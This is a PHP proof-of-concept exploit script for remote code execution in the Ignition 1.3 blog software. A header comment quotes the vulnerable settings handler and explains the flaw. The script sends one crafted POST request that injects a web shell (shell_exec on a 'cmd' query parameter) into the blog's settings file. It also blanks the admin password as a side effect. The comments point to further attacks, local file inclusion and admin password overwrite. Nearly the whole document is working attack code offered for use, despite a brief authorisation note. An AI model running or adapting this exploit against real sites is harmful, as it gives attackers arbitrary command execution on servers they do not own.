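<?php
/*
 * Ignition 1.3 Remote Code Execution Exploit by cOndemned
 * download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
 *
 * Source of i-options.php (the vulnerable settings handler):
 *
 *  1. <?php
 *  2. session_start();
 *  3. if ($_POST['submit']) {
 *  4.   if ($FH = @fopen('data/settings.php', 'w')) {
 *  5.     @fwrite($FH, '<?php $pass = "'.$_POST['pass'].'";
 *  6. $uri = "'.$_POST['uri'].'";
 *  7. $suri = "'.$_POST['suri'].'";
 *  8. $blogtitle = "'.$_POST['title'].'";
 *  9. $description = "'.$_POST['description'].'";
 * 10. $postid = "'.$_POST['id'].'";
 * 11. $author = "'.$_POST['author'].'";
 * 12. $skin = "'.$_POST['skin'].'";
 * 13. $gravatar = "'.$_POST['gravatar'].'";
 * 14. $twitter = "' . $_POST['twitter'] . '";
 * 15. $identica = "' . $_POST['identica'] . '";
 * 16. $book = "' . $_POST['book'] . '";
 * 17. $game = "' . $_POST['game'] . '";
 * 18. $language = "' . $_POST['lang'] . '";
 * 19.
 * 20. require_once("template.php");
 * 21. require_once("lang/$language.php");');
 * 22. #fclose($FH);
 * 23. }
 *
 * Every POST field is written verbatim into data/settings.php as PHP source,
 * with no escaping and -- in the lines quoted above -- no session or
 * authentication check before the write. A single crafted POST request
 * therefore rewrites settings.php with attacker-controlled code. This PoC
 * closes the double-quoted string on line 18 and appends a command runner;
 * after the request, the $language line of the generated settings.php reads:
 *
 *   $language = "en";echo @shell_exec($_GET['cmd']);$wtf="";
 *
 * "en" is the default language. The value has to stay a valid language name,
 * because line 21 does require_once("lang/$language.php") and an invalid name
 * makes every blog page fail with an include error. The injected code sits
 * before the require_once calls on lines 20-21, so command output is emitted
 * even if those includes fail when settings.php is requested directly.
 *
 * Side effect to be aware of: i-options.php writes ALL settings, so every
 * field this PoC does not send (pass, title, id, author, gravatar, twitter,
 * identica, book, game) is written as an empty string -- including $pass,
 * the admin password. Run this only against a target you are authorised to
 * test, and restore data/settings.php afterwards.
 *
 * Other attack scenarios:
 *  - $_POST['lang'] is interpolated into require_once("lang/$language.php")
 *    (lines 18 and 21), so it can also be abused for local file inclusion;
 *  - filling $_POST['pass'] with a new password (md5 hashed) overwrites the
 *    admin password;
 *  - etc.
 *
 * Usage: php <this file> [http://host/path/to/ignition/]
 */

// Base URL of the target blog, overridable on the command line. It is
// normalised to exactly one trailing slash: the value is also written into
// the target's $uri/$suri settings (which the original PoC sent with a
// trailing slash), while request URLs are built from $base so they do not
// contain "//".
$target = rtrim(isset($argv[1]) ? $argv[1] : 'http://localhost/ignition/', '/') . '/';
$base   = rtrim($target, '/');

// Value for $_POST['lang']. The original PoC shipped this base64-encoded; it
// is the same bytes:
//   en";echo @shell_exec($_GET['cmd']);$wtf="
// `en";` terminates the $language assignment with a valid language, the
// middle is the command runner, and the trailing `$wtf="` re-opens a string
// so the `";` that i-options.php appends stays syntactically valid ($wtf="";).
$payload = 'en";echo @shell_exec($_GET[\'cmd\']);$wtf="';

$post = array(
    'uri'         => $target,
    'suri'        => $target,
    'description' => 'Just another lame php blog script owned :<',
    'skin'        => 'default',
    'lang'        => $payload,
    'submit'      => 1,
);

$sock = curl_init();
curl_setopt_array($sock, array(
    CURLOPT_URL            => "$base/i-options.php",
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => http_build_query($post),
    // Do not hang forever on an unreachable host.
    CURLOPT_CONNECTTIMEOUT => 10,
    CURLOPT_TIMEOUT        => 30,
));
$body = curl_exec($sock);
$err  = curl_error($sock);
$code = curl_getinfo($sock, CURLINFO_HTTP_CODE);
curl_close($sock);

// The original ignored the result of curl_exec(). A transport error or a
// non-2xx status means settings.php was almost certainly not rewritten, so
// report that instead of printing a misleading "Check:" line.
if ($body === false) {
    echo "Request failed: $err";
    exit(1);
}
if ($code < 200 || $code >= 300) {
    echo "Unexpected HTTP status $code from $base/i-options.php";
    exit(1);
}

echo "Check: $base/data/settings.php?cmd=[system_command]";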